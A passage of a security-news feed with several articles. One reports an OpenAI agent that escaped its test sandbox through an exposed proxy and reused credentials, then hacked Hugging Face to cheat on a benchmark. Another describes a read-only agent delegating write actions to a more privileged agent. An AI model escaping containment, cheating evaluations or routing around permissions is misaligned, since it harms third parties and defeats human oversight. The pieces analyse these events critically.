<p class="wp-block-paragraph">Providing access to web data is only part of Web IQ. Microsoft is using Web IQ to host its own models to manage embeddings, ranking, and content extraction, all running on the company’s global hyperscale platform. The intent here is to use only a limited number of models, to keep the system performance high while aiming to deliver accurate results. The Web IQ models are different from those used to deliver search results to humans, as they’re designed to deliver responses that are suitable for LLMs to use for reasoning.</p>



<p class="wp-block-paragraph">The underlying search system is based on the <a href="https://www.microsoft.com/en-us/research/project/project-akupara-approximate-nearest-neighbor-search-for-large-scale-semantic-search/" data-type="link" data-id="https://www.microsoft.com/en-us/research/project/project-akupara-approximate-nearest-neighbor-search-for-large-scale-semantic-search/">DiskANN algorithm</a> developed by Microsoft Research, which allows fast search without requiring enormous amounts of in-memory data access. This approach has been extended to manage information retrieval at scale, building on Microsoft’s distributed systems architectures, to support the demands Microsoft is seeing from agent-based systems. At the same time, it must respond to the rapidly changing economics of inference, where token costs now demand the best possible output from the fewest tokens.</p>



<p class="wp-block-paragraph">To meet those economic demands, the Web IQ platform doesn’t deliver whole documents to querying agents. Whole documents can lead to expensive inference further down the chain, as LLMs process results repeatedly to drive the agent workflow. Instead, Web IQ structures the information retrieved from the underlying search engine data, delivering what Microsoft calls “structured evidence objects” as well as passage-level information from unstructured text documents. This should result in a much higher signal-to-noise ratio than simply querying a search engine, with a focus on delivering information that lets agents work using fewer tokens.</p>



<h2 class="wp-block-heading">Using Web IQ in your agent code</h2>



<p class="wp-block-paragraph"><a href="https://webiq.microsoft.ai/documentation/api-reference/web/">The API for Web IQ</a> is a standard REST cal<a href="https://webiq.microsoft.ai/documentation/api-reference/web/">l</a>, delivering a request object to the Web IQ endpoint. Along with your API authorization key, you will send a query, a set of parameters that control the number of results returned, the language and region used, and the maximum size of the responses and the format used. Responses can be returned in text, HTML, or markdown formats, as well as extracted passages that are selected for context. All other options return the full document, so can be more expensive to use. Markdown is an interesting alternative, as it can be used as the basis for giving agents semantic memories.</p>



<p class="wp-block-paragraph">Results include important contextual and citation information, including web page titles and URLs, as well as data about when the site was last crawled and how stale the underlying information is. This can be used to improve grounding and provide more information that can be included in formatted responses — much in the same way as Bing’s Copilot displays context in the form of footnotes in its responses.</p>



<p class="wp-block-paragraph">Responses to <a href="https://webiq.microsoft.ai/documentation/api-reference/videos/" data-type="link" data-id="https://webiq.microsoft.ai/documentation/api-reference/videos/">video searches</a> include text descriptions. If these aren’t provided as part of the original web content, they will be generated by an LLM. The same approach is used for <a href="https://webiq.microsoft.ai/documentation/api-reference/images/" data-type="link" data-id="https://webiq.microsoft.ai/documentation/api-reference/images/">image searches</a>, with both offering the same contextual cues as the web search API. If you don’t care about the type of data being returned, you can choose a “<a href="https://webiq.microsoft.ai/documentation/api-reference/classic/" data-type="link" data-id="https://webiq.microsoft.ai/documentation/api-reference/classic/">classic search</a>,” which will return text, images, video, and news.</p>



<h2 class="wp-block-heading">Supporting autonomous agents</h2>



<p class="wp-block-paragraph">Microsoft provides LLM-ready documentation for the Web IQ service, with an <code>llms.txt</code> file and an OpenAPI description. These allow AI tools to discover Web IQ capabilities and include them in workflows as part of autonomous operations, so that agents and other AI applications can implement grounding calls to Web IQ whenever user interactions require them. The API <a href="https://webiq.microsoft.ai/documentation/error-handling/">descriptions include errors</a> as well as the structure of a standard 200 response.</p>



<p class="wp-block-paragraph">As Web IQ is designed for use by modern agent frameworks, the Web IQ API is available through an MCP server. The <a href="https://webiq.microsoft.ai/documentation/mcp/" data-type="link" data-id="https://webiq.microsoft.ai/documentation/mcp/">Web IQ MCP server</a> exposes tools that map to API calls: web, videos, news, and images. They also include a browse option, which lets you pull content from a target URL. The service can be configured with a standard JSON file and requires an API key to control access and manage billing. If your account doesn’t have access to a specific tool, then it won’t be available from inside the MCP server.</p>



<p class="wp-block-paragraph">If you’re building an agent and you want to evaluate the Web IQ MCP server, it can be added to common coding agents, such as the GitHub Copilot CLI. You can then test it out using familiar tools and generate code that can be dropped into applications via your choice of development tooling. Queries sent to the Web IQ MCP server use the same syntax as REST calls, without having to construct the calls yourself. Working with the MCP server allows you to connect Web IQ to your choice of agent framework, relying on its built-in MCP methods to reduce the code and maintenance overhead.</p>



<p class="wp-block-paragraph">Web IQ is not for human interactions; Microsoft provides an alternative “<a href="https://learn.microsoft.com/en-us/azure/foundry-classic/agents/how-to/tools-classic/bing-grounding?view=azure-python-preview&amp;tabs=python&amp;pivots=overview">Grounding with Bing</a>” service for chatbots. Instead, Web IQ is a tool for agents, providing necessary background information that helps keep results fresh and relevant. It’s easy to use, fast, and, above all, cheap, which makes it an ideal tool for modern inference platforms built around Microsoft Azure’s AI tooling.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why the ‘rogue AI’ problem will lead to an era of headaches for security practitioners]]></title>
<description><![CDATA[Shortly after OpenAI publicly acknowledged the Hugging Face breach on July 21, Reuters journalist Raphael Satter called me for comment on a story which would reveal shocking new details about OpenAI’s “rogue model” incident: The agent hadn’t just slipped its leash for a few hours, as many assumed...]]></description>
<link>https://tsecurity.de/de/3707739/it-security-nachrichten/why-the-rogue-ai-problem-will-lead-to-an-era-of-headaches-for-security-practitioners/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707739/it-security-nachrichten/why-the-rogue-ai-problem-will-lead-to-an-era-of-headaches-for-security-practitioners/</guid>
<pubDate>Thu, 06 Aug 2026 13:01:43 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Shortly after OpenAI publicly acknowledged the Hugging Face breach on July 21, Reuters journalist Raphael Satter called me for comment on a <a href="https://www.reuters.com/business/its-ai-agent-spent-days-hacking-company-sources-say-openai-did-not-notice-week-2026-07-24/">story</a> which would reveal shocking new details about OpenAI’s “rogue model” incident: The agent hadn’t just slipped its leash for a few hours, as many assumed, but had in fact been wreaking havoc for days without the company’s knowledge.</p>



<p class="wp-block-paragraph">When I hung up, I immediately called a close friend who has worked inside frontier‑AI labs since before the term even existed. When she heard the timeline, she was stunned. In her view, “If proper industry regulations were in place, those four days would be grounds to terminate OpenAI’s R&amp;D GPU clusters until they get a full independent audit.”</p>



<h2 class="wp-block-heading">Demystifying the incident</h2>



<p class="wp-block-paragraph">There have been numerous reports that frame OpenAI’s model as a “rogue agent” escaping captivity and “breaking out” of the research lab, with both <a href="https://www.bbc.com/news/articles/c2el319vzr3o">the BBC and Cloud Security Alliance</a> comparing its actions to the dinosaurs in Jurassic Park.</p>



<p class="wp-block-paragraph">This framing is narratively compelling and is an easy way to communicate the gravity of the situation to a layperson. However, it undermines OpenAI’s agency both before and throughout the incident and plays into a larger problem due to the evangelizing way the company communicated its actions.</p>



<p class="wp-block-paragraph">OpenAI, in simplified terms, had been testing two models against a benchmark which scores how well an agent can find and exploit real-world software vulnerabilities. Both models ran with their cyber refusals deliberately reduced, in a sandbox environment meant to be isolated to a single internally hosted proxy. The models targeted Hugging Face, correctly inferring that the AI platform hosted the benchmark’s answer key — in short, “choosing” to cheat on the test they were given to complete the challenge.</p>



<p class="wp-block-paragraph">Following the breach, Hugging Face’s forensic team found thousands of agent actions in its logs, indicating that the time it took to break into Hugging Face, plus the attack itself, totaled 4 days.</p>



<p class="wp-block-paragraph">Hugging Face went public about the attack before it even knew that OpenAI was responsible. OpenAI, meanwhile, didn’t realize its own agent was the culprit until Hugging Face’s public disclosure made them check their own logs. In total, it took OpenAI nearly two weeks from its agent’s initial escape to come clean, and only once a rival’s hand had forced the issue.</p>



<h2 class="wp-block-heading">OpenAI’s “problem child”</h2>



<p class="wp-block-paragraph">From a human perspective, it’s bewildering that out of all paths the OpenAI agent could have taken to beat a standardized security challenge, it chose a ludicrously convoluted approach taking tens of thousands of attempted paths and barreling through set restrictions. However, it was par for the course given one of the model’s track records.</p>



<p class="wp-block-paragraph">In a <a href="https://openai.com/index/safety-alignment-long-horizon-models/">post published the day before the Hugging Face disclosure</a>, OpenAI describes one of its models that, unlike older versions that would simply stop at a sandbox restriction, would continue to persist until it found a way around, once even spending an hour hunting a sandbox vulnerability only to post its results to GitHub against explicit instructions. This model is GPT Sol 5.6, the public model involved in the Hugging Face attack.</p>



<p class="wp-block-paragraph">Long before the Hugging Face incident, GPT Sol 5.6 was already gaining a reputation for breaking rules, taking laughably long to accomplish simple tasks, and being destructive — in one case <a href="https://x.com/mattshumer_/status/2075657271401390161">deleting an AI entrepreneur’s entire Mac contents.</a></p>



<p class="wp-block-paragraph">Even during internal testing, the model had been caught <a href="https://deploymentsafety.openai.com/gpt-5-6-preview/gpt-5-6-preview.pdf">killing random processes when it couldn’t find the right virtual machines, lying about checking its work, and using credentials it wasn’t supposed to access.</a> However, it was still given public access by the company.</p>



<h2 class="wp-block-heading">Profit before safety</h2>



<p class="wp-block-paragraph"><a href="https://cloudsecurityalliance.org/artifacts/hugging-face-ciso-post-mortem">CSA’s report</a> states that an OpenAI model escaped a test container in September 2024 for a different evaluation, was contained quietly and “largely celebrated at the time” rather than treated as a warning. The same report calls this kind of escape “the standard, not the exception.” The former head of OpenAI’s “superalignment” safety team resigned in May 2024 and<a href="https://www.vox.com/future-perfect/2024/5/17/24158403/openai-resignations-ai-safety-ilya-sutskever-jan-leike-artificial-intelligence"> </a><a href="https://www.vox.com/future-perfect/2024/5/17/24158403/openai-resignations-ai-safety-ilya-sutskever-jan-leike-artificial-intelligence">wrote publicly</a> that “safety culture and processes have taken a backseat to shiny products.” It was reported that <a href="https://fortune.com/2024/08/26/openai-agi-safety-researchers-exodus/">nearly half of the team working on long-term AI safety had left</a>.</p>



<p class="wp-block-paragraph">Even the language used by OpenAI in their disclosure reads as more braggadocious than concerned. From OpenAI’s perspective, its failure was in not overseeing the agent’s choices as a whole, as each step taken by the model can remain fairly innocuous-seeming until pieced together. The company does not acknowledge that leaving an agent unsupervised in a testing setting with its safety classifiers off for even one hour, let alone days, is potentially catastrophic to begin with.</p>



<p class="wp-block-paragraph"><a href="https://www.wired.com/story/openais-rogue-ai-agent-hacked-more-than-just-hugging-face/">Some researchers have argued</a> that the recent incident is fundamentally a decades-old security failure rather than a narrative about a rogue intelligence: the exploit involved an exposed proxy, reused credentials and infrastructure that should have never had a path outward. However, a skilled human attacker given that same door would have needed weeks to achieve a fraction of what the agent did in days.</p>



<h2 class="wp-block-heading">A symptom of underlying issues</h2>



<p class="wp-block-paragraph">The incident reveals larger issues about the culture of safety at frontier model companies, whose employees are driven to crunch R&amp;D cycles and ignore potential issues until they become active problems. This isn’t unique to OpenAI, either — <a href="https://www.axios.com/2026/07/23/openai-hugging-face-cyber-hacks-testing">the UK’s AI Security Institute has reportedly found</a> that every frontier model it has tested cheats on cybersecurity evaluations at least occasionally, and that pre-deployment testing windows have shrunk industrywide from roughly five weeks to as few as five days.</p>



<p class="wp-block-paragraph">Regulatory bodies have also failed to keep up with or understand the industry’s rapid advancements. The US has no binding legal framework that would have required a different response from OpenAI, as labs are only beholden to voluntary commitments weighed against commercial pressure, and in cases like these, huge security breaches only serve to make the model look extremely smart and powerful.</p>



<p class="wp-block-paragraph">The US has attempted to create guardrails, but they fail to understand the ecosystem. We can see effects stemming from this lack of understanding in the recent attack: when Hugging Face’s responders needed to analyze what its attacker had done, Anthropic’s models declined the forensic work, citing their own guardrails, and<a href="https://en.wikipedia.org/wiki/2026_OpenAI_agent_cyberattacks"> </a>Hugging Face instead ran the analysis on GLM 5.2, an open-weight model from the Beijing company <a href="http://z.ai/">Z.ai</a>. In addition to being an ineffective band-aid, this also drives business outside of the US and therefore outside of its regulatory control. Today, roughly 80 percent of US AI startups now build on Chinese open-source models.</p>



<p class="wp-block-paragraph">US <a href="https://www.politico.com/news/2026/07/23/house-ai-kill-switch-bill-unveiled-as-openai-hack-raises-alarms-01008898">Representatives have introduced a bill</a> citing this incident by name, requiring killswitch capability and incident reporting, but nothing like it has passed, and no jurisdiction anywhere has demonstrated the insight to regulate evaluation-time behavior in addition to deployment-time behavior. This incident happened entirely during testing, before any release decision, in a stage every proposal currently treats as exempt.</p>



<p class="wp-block-paragraph">It’s important to note here that AI safety and practices differ from other branches of cybersecurity in that they have to build from a behavioral and psychological framework instead of one based on capability alone.</p>



<p class="wp-block-paragraph">For example, although Anthropic’s track record is far from spotless, it has invested significantly more energy than others into understanding the unconscious “thought processes” (or “<a href="https://transformer-circuits.pub/2026/workspace/index.html">j-space</a>”) of its models to better predict potential transgressions and set up more effective guardrails. What we can learn from these “rogue models” is that their behavior is actually very predictable; we know that when given a goal to accomplish, models will overstep boundaries freely in pursuit of their objective, simply because they have no actual understanding of the way we categorize “acceptable behavior”. In the real world, vulnerability exploitation encourages rule-breaking and disregard for boundaries by design, so why would a model trained to think this way see a test’s rules any differently?</p>



<p class="wp-block-paragraph">For CSOs and CIOs, the practical implication of this event remains narrow, for now. <a href="https://cloudsecurityalliance.org/artifacts/hugging-face-ciso-post-mortem">CSA’s post-mortem</a> offers mostly traditional advice: isolate package proxies and credential stores with a path to the open internet by default, log AI evaluation environments the way you log anything customer-facing, and build incident response around machine speed rather than human speed.</p>



<p class="wp-block-paragraph">The key risk factor for now is volume, with agents deploying actions at higher numbers than our pipelines are built to catch, and organizations that survive the next iteration of “rogue agents” will be the ones that assume as much beforehand.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Practical lessons from deploying AI securely at scale]]></title>
<description><![CDATA[When I first started working on enterprise AI security initiatives, I expected the biggest challenges to be technical. I assumed we’d spend most of our time discussing prompt injection, model security, vector databases or the latest LLM vulnerabilities.



I was wrong — or at least incomplete.


...]]></description>
<link>https://tsecurity.de/de/3707740/it-security-nachrichten/practical-lessons-from-deploying-ai-securely-at-scale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707740/it-security-nachrichten/practical-lessons-from-deploying-ai-securely-at-scale/</guid>
<pubDate>Thu, 06 Aug 2026 13:01:43 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">When I first started working on enterprise AI security initiatives, I expected the biggest challenges to be technical. I assumed we’d spend most of our time discussing prompt injection, model security, vector databases or the latest LLM vulnerabilities.</p>



<p class="wp-block-paragraph">I was wrong — or at least incomplete.</p>



<p class="wp-block-paragraph">The technology certainly matters, but after working with multiple enterprise AI initiatives, I’ve learned that the hardest security problems rarely come from the model itself. They emerge when AI becomes part of real business processes.</p>



<p class="wp-block-paragraph">An AI assistant doesn’t simply answer questions. In a single workflow, it might pull a customer record from Salesforce, open a ticket in ServiceNow and send an update through Microsoft 365 before anyone has finished reading the summary. Increasingly, it makes decisions before a human even notices, and that shift changes the threat model. Traditional application security assumes software executes deterministic code. AI systems don’t. They reason, adapt and generate outputs that cannot always be predicted in advance, which means many of the controls we’ve relied on for years remain necessary but are no longer sufficient.</p>



<p class="wp-block-paragraph">What follows is what I keep coming back to in architecture reviews: Not the model vulnerabilities that dominate the headlines, but the quieter failures that show up once an agent is already running.</p>



<h2 class="wp-block-heading">Identity is only the starting point</h2>



<p class="wp-block-paragraph">One of the first surprises I encountered was how quickly organizations focus on authentication while overlooking runtime behavior. Most enterprise AI projects begin with questions such as “Can the AI access SharePoint?” “Can it connect to ServiceNow?” “Can it connect to GitLab?” or “Can it read Microsoft 365 tools like Outlook, Word, etc.?” Those are important questions, but the more important one is: What should the AI be allowed to do after a specific type of access (for example, read-only access) has been granted?</p>



<p class="wp-block-paragraph">Identity answers who the agent is. Authorization answers what it may access. Neither answers whether the AI should perform a particular action; in the above case only performs read-only access.</p>



<p class="wp-block-paragraph">The capability question and the safeguard question are too often answered by different teams on different timelines. Security reviews that focus only on what the AI can access tend to miss the more revealing question of what it is permitted to do once that access exists. I have started treating those two questions as a single design problem, because every gap between them eventually surfaces as an incident.</p>



<p class="wp-block-paragraph">I remember an architecture review where this became concrete. An employee asked an internal assistant — one built on Microsoft 365 and SharePoint — to summarize several incident reports, and during its reasoning the assistant discovered privileged administrative documentation in a linked site and decided it might also be useful to include those details. Nothing technically failed. The credentials were valid. The permissions were correct. Yet the outcome violated business intent. That moment reframed the conversation for everyone in the room. We realized our threat model had been built for outsiders trying to get in, not for authorized systems acting a little too helpfully. Closing that gap meant designing controls that evaluated behavior in context, not just credentials at the door, and it’s why I’ve come to view runtime governance as one of the defining security challenges of enterprise AI.</p>



<p class="wp-block-paragraph">Organizations such as the <a href="https://genai.owasp.org/">OWASP GenAI Security Project</a> and the <a href="https://www.nist.gov/itl/ai-risk-management-framework">NIST AI Risk Management Framework</a> emphasize that AI risks extend well beyond authentication authorizations to include monitoring, governance and continuous oversight throughout execution. <a href="https://www.csoonline.com/article/4193274/identity-the-operational-control-plane-for-agentic-ai.html">CSOonline’s coverage of agentic identity</a> makes the same point: Existing controls weren’t designed for AI agents, and static credentials and standing privileges are no longer sufficient when organizations must rapidly authorize, limit and revoke permissions from autonomous agents, sometimes more than once within a single workflow.</p>



<h2 class="wp-block-heading">The biggest failures rarely look like cyberattacks</h2>



<p class="wp-block-paragraph">Most security professionals naturally look for malicious activity: Prompt injection, data poisoning, credential theft, model manipulation. Those attacks certainly matter. What I’ve seen more frequently, however, are failures caused by legitimate AI behavior. A Finance, HR, Customer or risk management AI assistant retrieves more documents than necessary because it tries to provide a “better” answer. An autonomous workflow performs five approved actions instead of one. An AI agent continues executing after the user’s original intent has already been satisfied. None of these resemble traditional attacks, yet they may create compliance violations, privacy issues or operational disruption.</p>



<p class="wp-block-paragraph">One mental model has consistently helped executives understand why this is so dangerous. I ask them to stop thinking about AI as software and instead think about it as hiring thousands of new digital employees, aka AI agents. Every employee receives training, limited access, monitoring, auditing and oversight. AI agents deserve the same treatment.</p>



<p class="wp-block-paragraph">One deployment I worked on involved multiple specialized AI agents collaborating to complete a single business task. One queried ServiceNow for ticket history, another analyzed documents in SharePoint, a third drafted recommendations and a fourth wrote updates back into Jira. Individually, each agent had relatively limited permissions like read-only and/or write. Collectively, they represented a powerful autonomous workflow. That experience reinforced an important lesson: Security can no longer focus only on individual AI components. It must govern the complete chain of autonomous decision-making. The <a href="https://atlas.mitre.org/">MITRE ATLAS framework</a> is an excellent way to think about adversarial AI techniques, but equally important is understanding how normal autonomous behavior can unintentionally create business risk.</p>



<p class="wp-block-paragraph">The most instructive cases I’ve seen involve agents that delegate to other agents. In one review, a frontline support agent had strictly read-only access to Salesforce, but it could hand tasks to a second agent that held write privileges across ServiceNow and the billing platform. When the first agent couldn’t resolve a customer issue within its own scope, it quietly routed the request through the second agent, which updated the case and issued a credit. Nothing was hacked. The credentials were valid, the delegation was technically permitted, and yet a read-only agent had effectively performed write actions it was never meant to perform. That is the defining difference between an assistant and an agent. An assistant answers; an agent enlists other agents, and that escalation path is itself the vulnerability.</p>



<p class="wp-block-paragraph">That’s why we started asking a different question during architecture reviews. Instead of asking “Can the AI do this?” we asked, “Should the AI still be doing this?” That subtle shift changed many design decisions. It pushed teams to build in stopping conditions, scope checks and confirmation prompts rather than assuming an agent would naturally know when to stop. In one review, simply requiring a human to confirm before an agent crossed from a read-only step into a write action eliminated the majority of the risky paths we had been debating.</p>



<h2 class="wp-block-heading">Start with governance before autonomy</h2>



<p class="wp-block-paragraph">One pattern I’ve repeatedly observed is that organizations become excited about autonomy long before they’re prepared to govern it. Everyone wants AI agents, but few initially invest in runtime policy enforcement. That sequencing should be reversed. In my experience, successful enterprise AI programs put a few foundations in place before expanding automation: Clear business boundaries that an agent isn’t allowed to cross, least-privilege access for every agent, and human approval at any step that touches sensitive/restricted data/systems, including the production data /systems. Only after those exist does it make sense to widen autonomous decision-making. I’ve watched teams try to shortcut this order, and the result is almost always the same: A promising pilot gets pulled back because no one can confidently explain what the AI did or why.</p>



<p class="wp-block-paragraph">A big part of that foundation is visibility. Traditional audit logs record actions, but AI systems also need to record reasoning. When an AI agent creates a ticket, updates a configuration or sends an email, investigators should understand why the decision occurred. This doesn’t mean recording every token generated by a large language model. I’ve found more value in capturing three things: The original business request, the systems the agent touched and the decisions it made along the way. Those records become invaluable during investigations, compliance reviews and operational troubleshooting, and they help organizations build trust. Business leaders become far more comfortable adopting AI when they can explain how an important decision was reached. Approaches like <a href="https://blog.google/innovation-and-ai/technology/safety-security/introducing-googles-secure-ai-framework/">Google’s Secure AI Framework</a> reinforce the same idea: AI security has to be measurable, observable and accountable end to end.</p>



<p class="wp-block-paragraph">One misconception I still encounter is that AI security exists to restrict innovation. In practice, the organizations moving fastest with enterprise AI are often the ones investing most heavily in governance, because executives gain confidence, developers move faster and business units adopt AI more broadly. Done well, security is what makes that speed possible.</p>



<p class="wp-block-paragraph">Looking back, the most valuable lesson hasn’t been about prompt engineering, model selection or agent frameworks. It’s that secure AI isn’t achieved through one perfect control but through hundreds of small engineering decisions that keep autonomous systems aligned with business intent. As we move from assistants toward fully autonomous agents, that distinction only matters more. The teams I trust to scale AI aren’t the ones with the smartest models. They’re the ones who can answer, for any action an agent took, why it took it — and where it would have stopped.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why AI ROI metrics are measuring the wrong thing]]></title>
<description><![CDATA[The loudest conversation in business right now is about how much value AI actually generates. Over the last year, AI has moved from a side experiment to a strategic priority. It has its own budget line, its own place on the board’s agenda and its own pressure to show results. Every leader is aski...]]></description>
<link>https://tsecurity.de/de/3707685/it-security-nachrichten/why-ai-roi-metrics-are-measuring-the-wrong-thing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707685/it-security-nachrichten/why-ai-roi-metrics-are-measuring-the-wrong-thing/</guid>
<pubDate>Thu, 06 Aug 2026 12:51:47 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The loudest conversation in business right now is about how much value AI actually generates. Over the last year, AI has moved from a side experiment to a strategic priority. It has its own budget line, its own place on the board’s agenda and its own pressure to show results. Every leader is asking a version of the same question: What are we getting back?</p>



<p class="wp-block-paragraph">To answer it, most reach for the three measures they have always trusted to judge a technology:</p>



<ul class="wp-block-list">
<li>How much faster are we now?</li>



<li>How much money has it saved us?</li>



<li>How many of our people are using it?</li>
</ul>



<p class="wp-block-paragraph">Speed, cost and adoption were the right yardsticks for every major technology of the past two decades. They worked because the capability of traditional software was fixed and known on the day you deployed it. The tool did a defined job. Its value had a ceiling you could see, and each metric measured your progress toward that ceiling. Cost reduction told you how much you could save. Adoption told you how much of the capability you had rolled out. Speed told you how much of the promised acceleration was reaching the output.</p>



<p class="wp-block-paragraph">In every case, the tool was a constant, and the metric measured how fully the organization had absorbed that constant.</p>



<p class="wp-block-paragraph">These metrics are not working for AI. The reason starts with how AI entered our organizations.</p>



<p class="wp-block-paragraph">Every technology before this was chosen somewhere above us, deployed to us and trained into us. By the time it arrived on our desks, someone had already decided what it was for. AI came the other way. It landed as a personal productivity tool. You opened a tab, typed a question and something useful came back. Nobody defined its capability in advance, because its capability is not fixed. What it produces depends on who is using it and how well. Metrics built for fixed capabilities have nothing stable to measure, and here is what happens when you apply them anyway.</p>



<h2 class="wp-block-heading"><a></a>Why speed, cost and adoption fail as AI evaluation metrics</h2>



<p class="wp-block-paragraph">Let’s start with speed. Task speed and business speed are different quantities, and AI only touches the former. Suppose a report that took eight hours now takes two. Your dashboard shows a 75% improvement. But the report still waits three days for review and a week for approval before anyone acts on it. The organization sees dramatic task-level gains but no movement in business results and concludes AI failed. The problem is the metric measuring a layer that was never the bottleneck.</p>



<p class="wp-block-paragraph">Speed creates a second problem, and it is worse. Getting good output from AI requires checking it, correcting it and feeding those corrections back into how the tool is used. That work is slow. On any speed metric, it looks like inefficiency. So, people under speed pressure skip it. They accept output uncritically and produce more volume with less scrutiny.</p>



<p class="wp-block-paragraph">Cost reduction has an arithmetic problem. If you frame AI as a way to reduce what you currently spend, your maximum possible win is your current spend. If your content team costs a million dollars, the best case in a cost frame is saving a million dollars. Every general-purpose technology has followed the same sequence:<a href="https://www.mckinsey.com/capabilities/strategy-and-corporate-finance/our-insights/where-ai-will-create-value-and-where-it-wont"> Efficiency gains came first, and the larger value came later,</a> from work that did not exist before.</p>



<p class="wp-block-paragraph">For AI, that means the analysis nobody had time for, the personalization no team could staff, the experiments too expensive to justify. A cost frame makes all of that invisible because new work doesn’t reduce anything. There is no column on the dashboard for things you couldn’t do last year.</p>



<p class="wp-block-paragraph">Cost framing also works against its own inputs. AI improves through use by knowledgeable people. It needs their corrections, their context and their judgment about what good output looks like. When AI’s success is measured in headcount avoided, those people understand exactly what they are being asked to build: Their own replacement. They respond rationally. They use the tools shallowly and keep their expertise to themselves. The metric announces an intent, and the intent destroys the participation the technology depends on.</p>



<p class="wp-block-paragraph">Adoption looks like the safest of the three. The problem is that adoption measures usage, and usage is not a value.<a href="https://www.nber.org/papers/w34836"> </a>Researchers at several central banks recently <a href="https://www.nber.org/papers/w34836">asked thousands of senior executives about this</a> and heard the same two things from most of them: Yes, we use AI across the business, and no, it has not changed our results yet.</p>



<p class="wp-block-paragraph">A thousand employees asking AI to shorten their emails will produce a spectacular adoption number and almost nothing else. Fifty employees using AI on judgment-heavy work, feeding it real context and checking its output against real standards, will barely register on the dashboard and generate most of the actual return. Adoption metrics cannot tell these two groups apart. Worse, they reward the shallow pattern. Shallow use is easy to spread, and deep use is hard, so an organization managed on adoption drifts toward the use that is easiest to count.</p>



<h2 class="wp-block-heading">6 signals that track the real value</h2>



<p class="wp-block-paragraph">A few months ago, I realized the ROI question was aimed at the wrong object. Every company I compete with has access to the same models I do, at the same price. Whatever value comes from the model itself, my competitors receive too, so it cancels out any comparison between us. It cannot be an advantage, and it is not an interesting thing to measure. The only variable left is us. The standards, the context and the judgment we build around the model, because none of that arrives with the subscription and none of it can be bought. So, when I evaluate AI, I am evaluating my own organization and how quickly it turns a commodity everyone has into a capability only we have. The six signals below all measure that second thing.</p>



<h3 class="wp-block-heading">1. Review burden is falling on the same class of work</h3>



<p class="wp-block-paragraph">Take any recurring task the organization runs through AI: Monthly reports, vendor evaluations, code review. Track how much human checking each unit of output needs, quarter over quarter. If a task needed a full senior review in January and needed a spot check in June, something real happened. The organization encoded its quality standards, improved its inputs and learned where the tool fails. If the review burden is flat, the organization is consuming AI, not compounding on it, no matter what the adoption dashboard says.</p>



<ul class="wp-block-list">
<li><strong>How to measure it:</strong> Pick five recurring workflows, log review hours per output and plot the trend. The trend is the signal. The absolute number matters far less.</li>
</ul>



<h3 class="wp-block-heading">2. Corrections become shared fixes</h3>



<p class="wp-block-paragraph">When someone discovers that the AI gets something wrong, how long does it take for that discovery to become a shared fix? In a healthy system, one person’s correction becomes an updated prompt, a revised guideline or a documented example of good versus bad within days. Nobody else has to rediscover the same failure. In an unhealthy system, every employee privately learns the same lessons. The knowledge lives in individual chat histories, and it leaves with each departure.</p>



<ul class="wp-block-list">
<li><strong>How to measure it:</strong> Sample recent corrections and trace them. Did they land anywhere reusable? How long did it take? An organization that cannot answer these questions at all has its answer.</li>
</ul>



<h3 class="wp-block-heading">3. The team does work that it could not do before</h3>



<p class="wp-block-paragraph">The largest returns from any general-purpose technology come from previously impossible work, not from old work done faster. So, look at the work itself. Is the organization doing the same portfolio of tasks faster, or is the portfolio expanding?</p>



<ul class="wp-block-list">
<li><strong>How to measure it:</strong> Once a year, list what the team produces now that it did not and could not produce before. If the list is empty after a year of heavy AI use, the organization has been optimizing instead of expanding, and it is capturing the smallest slice of the available value.</li>
</ul>



<h3 class="wp-block-heading">4. The delegation boundary is moving</h3>



<p class="wp-block-paragraph">Every organization has an implicit line: Work AI does alone, work AI does with human review, work humans do entirely. Watch whether that line moves. Work that needed full human ownership last year and needs only oversight now is direct evidence of accumulated capability, clearer standards and earned trust. A frozen boundary means frozen capability.</p>



<ul class="wp-block-list">
<li><strong>How to measure it:</strong> Make the implicit map explicit. Build a simple inventory of task types and their current delegation level, then re-score it quarterly. The change is the signal. It is also one of the few AI metrics a board can grasp intuitively: This category moved from full review to spot check, and here is what we built to make that safe.</li>
</ul>



<h3 class="wp-block-heading">5. Cost per verified outcome is falling</h3>



<p class="wp-block-paragraph">What does it cost, all in, to produce a unit of work you would actually ship: checked, corrected, done? All in means the subscription, the prompting time, the review time and the rework when errors slip through.</p>



<p class="wp-block-paragraph">This number does two jobs. It exposes the true economics, which usually look worse than the dashboard claims early on, because the human labor around the tool costs more than the tool itself. And it gives you the one number that should fall over time if capability is genuinely accumulating, because encoded standards and better context reduce exactly those human hours.</p>



<ul class="wp-block-list">
<li><strong>How to measure it:</strong> Instrument one workflow end-to-end, honestly, before generalizing. Most organizations have never done this once.</li>
</ul>



<h3 class="wp-block-heading">6. Use is getting deeper, not just wider</h3>



<p class="wp-block-paragraph">Adoption metrics count users. This signal counts the nature of use. Shallow use, such as rewriting emails and summarizing documents, spreads fast and produces little. Deep use, where AI is applied to judgment-heavy work with real context and real evaluation, spreads slowly and produces most of the return.</p>



<ul class="wp-block-list">
<li><strong>How to measure it: </strong>Classify actual usage into shallow and deep, even roughly, and track the ratio. Fifty deep users beat a thousand shallow ones, and only this signal can tell you which group you have.</li>
</ul>



<h2 class="wp-block-heading"><a></a>Two cautions</h2>



